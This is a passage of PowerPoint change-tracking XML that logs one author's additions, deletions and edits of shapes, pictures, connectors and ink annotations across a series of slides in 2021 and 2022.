        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:23:37.764" v="1225" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="156228340" sldId="454"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:43:51.230" v="1012" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="156228340" sldId="454"/>
            <ac:spMk id="2" creationId="{2E051C2F-9025-48D3-8554-B0E0E3B004AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:23:37.764" v="1225" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="156228340" sldId="454"/>
            <ac:inkMk id="4" creationId="{EDFF498D-D4F3-23C4-B8E5-384CCA35164D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:54.873" v="260" actId="12"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="965843776" sldId="467"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:50:54.873" v="260" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="965843776" sldId="467"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:28.353" v="1220" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3015196105" sldId="491"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:55:55.940" v="1208" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:spMk id="6" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:09.892" v="1213"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="9" creationId="{5FD950B2-DD7A-980E-5E00-B869EBABC833}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:21.722" v="1216"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="14" creationId="{CD82EAA9-56DE-7307-51C7-D66684EC869E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="17" creationId="{53717940-0304-7AE9-651D-B8787D49385E}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:grpSpMk id="19" creationId="{BA2092D9-41BB-35DA-110D-05E0D7227419}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:17:18.099" v="1147" actId="21"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:picMk id="7" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-08-30T13:01:57.973" v="14" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:picMk id="10" creationId="{2039D276-9706-43EB-83A2-1A66F8880AE7}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="7" creationId="{960A42CD-C9C2-4F3C-EA82-08FC10F02016}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="8" creationId="{26BCBAFC-B799-8E38-6A3E-E2C84191B8C7}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="13" creationId="{D462BE2A-6A73-B7B3-A568-77DA09958A48}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:14.430" v="1214" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="15" creationId="{0682F64C-86ED-FDF8-AC44-630D4AC5A445}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="16" creationId="{D408BFF6-7043-3711-DEA9-6EC294C297C5}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:23.587" v="1218"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="18" creationId="{1BC7AFB8-97AF-83CE-D450-18CEBF7C5B06}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:26.840" v="1219" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="20" creationId="{C8355774-87A5-919B-E69E-1F51DDFC4A58}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T21:56:28.353" v="1220" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3015196105" sldId="491"/>
            <ac:inkMk id="21" creationId="{C4E34C17-51EA-F1E7-199C-A0E5A43F3001}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:02:34.507" v="1221" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1674251011" sldId="492"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-08-30T13:09:56.528" v="41" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:spMk id="12" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-08-30T13:09:32.444" v="38"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:picMk id="13" creationId="{6D4CB1C1-5E6E-4A60-AA2A-6F438E77FB09}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:02:34.507" v="1221" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:inkMk id="4" creationId="{1432862E-03CB-4412-166B-0D44F528ACDF}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-08-30T13:09:36.412" v="39" actId="14100"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:cxnSpMk id="11" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-08-30T13:09:32.444" v="38"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1674251011" sldId="492"/>
            <ac:cxnSpMk id="15" creationId="{BF32E79E-7808-4B3C-A85C-7876A58075FA}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:15:26.201" v="1222" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2416641626" sldId="493"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:15:26.201" v="1222" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2416641626" sldId="493"/>
            <ac:inkMk id="2" creationId="{DBE5B3CB-0C46-5BFC-C965-C3B23702C669}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:16.953" v="1224" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="311612657" sldId="494"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:29:39.232" v="50" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="311612657" sldId="494"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:05.147" v="1223" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="311612657" sldId="494"/>
            <ac:inkMk id="2" creationId="{FBD06D31-7CAC-5B43-D03B-877056D08B72}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:22:16.953" v="1224" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="311612657" sldId="494"/>
            <ac:inkMk id="6" creationId="{CCE866D0-3FE2-6B52-B626-F1397DA2AD3D}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:26:49.884" v="1227" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1035595462" sldId="498"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:44:30.890" v="77" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1035595462" sldId="498"/>
            <ac:spMk id="4" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:26:49.884" v="1227" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1035595462" sldId="498"/>
            <ac:inkMk id="2" creationId="{96C1D5EF-A478-2D77-CFC4-CB7513BD80CE}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:29:12.469" v="1228" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1984385075" sldId="499"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:29:12.469" v="1228" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1984385075" sldId="499"/>
            <ac:inkMk id="2" creationId="{95B91847-4ACB-D04A-3B3A-37F13EEDEA78}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:35:37.927" v="1229" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3318379012" sldId="500"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:47:17.092" v="1014" actId="6549"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:spMk id="5" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-02-23T13:47:32.650" v="1015" actId="478"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:spMk id="10" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:35:37.927" v="1229" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3318379012" sldId="500"/>
            <ac:inkMk id="3" creationId="{43E7A8F8-8CEA-7F30-B0EF-A79C5B5E1DAC}"/>
          </ac:inkMkLst>
        </pc:inkChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:39:26.528" v="1230" actId="9405"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="198983510" sldId="502"/>
        </pc:sldMkLst>
        <pc:inkChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T22:39:26.528" v="1230" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:inkMk id="2" creationId="{DB85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:cxnChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:28:57.634" v="1205" actId="13822"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:cxnSpMk id="3" creationId="{743F91A7-6CB8-DB6A-2DDD-A6B0E1D0F328}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-26T12:29:09.438" v="1206" actId="11529"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="198983510" sldId="502"/>
            <ac:cxnSpMk id="7" creationId="{5810B019-E431-AF3A-5D0A-AB6946B1AA80}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp mod">
        <pc:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1270554279" sldId="505"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="16" creationId="{F8730BDB-793B-1014-8282-8B952393E214}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:15.824" v="1129" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="17" creationId="{8CC032C4-89B7-DB99-ABC3-16D128B777F5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:58:05.688" v="399" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="46" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2021-09-09T15:58:11.255" v="405" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:spMk id="47" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="8" creationId="{1AF44B25-39B4-EDD2-4140-16B3F7C3CE8A}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:07.361" v="1120"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="11" creationId="{527AD5DD-B295-2283-C83A-4CCA76091787}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:grpChg chg="mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:12.322" v="1123"/>
          <ac:grpSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:grpSpMk id="14" creationId="{334429DB-D5AE-4151-27CC-E1B608364EC4}"/>
          </ac:grpSpMkLst>
        </pc:grpChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:47:03.897" v="1127" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:picMk id="15" creationId="{79CF65A8-3BAC-A603-E081-E7D33A9739A1}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:inkChg chg="add del">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:45:52.675" v="1112" actId="9405"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="2" creationId="{FC692961-5229-6127-3402-D8498ECA5B21}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="3" creationId="{BF9FB33B-E9EA-E8FB-D34D-41695C035B55}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="5" creationId="{147A0012-B335-1771-B812-93AD13ED98B3}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="6" creationId="{4579FA74-FCDA-31DA-502D-352D9E90BA49}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
          <ac:chgData name="Weifeng Xu" userId="e7aed605-a3dd-4d5a-a692-a87037af107b" providerId="ADAL" clId="{761B83AC-F9AE-4056-9599-2DACFAA8A130}" dt="2022-09-05T12:46:01.915" v="1117"/>
          <ac:inkMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1270554279" sldId="505"/>
            <ac:inkMk id="7" creationId="{3F5A0F89-9C55-CFE0-5C5F-FF2FF6652324}"/>
          </ac:inkMkLst>
        </pc:inkChg>
        <pc:inkChg chg="add mod">
